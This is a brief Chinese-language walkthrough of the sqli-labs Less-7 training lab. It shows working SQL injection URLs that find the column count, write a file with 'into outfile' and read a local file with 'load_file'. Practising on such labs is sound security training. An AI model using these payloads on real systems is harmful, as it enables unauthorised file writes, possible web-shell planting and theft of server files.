sqli-labs-master/Less-7 文件读写

正常访问 http://localhost/sqli-labs-master/Less-7/?id=1

发现单引号报错

http://localhost/sqli-labs-master/Less-7/?id=1'

通过 order by 查出字段数为3

http://localhost/sqli-labs-master/Less-7/?id=1')) order by 4 --+

文件写入

http://localhost/sqli-labs-master/Less-7/?id=-1')) union select "aa","bb","cc" into outfile 'd:/test/a.txt' --+

文件读取

http://localhost/sqli-labs-master/Less-1/?id=-1' union select 1,2,load_file("c:/log.txt") --+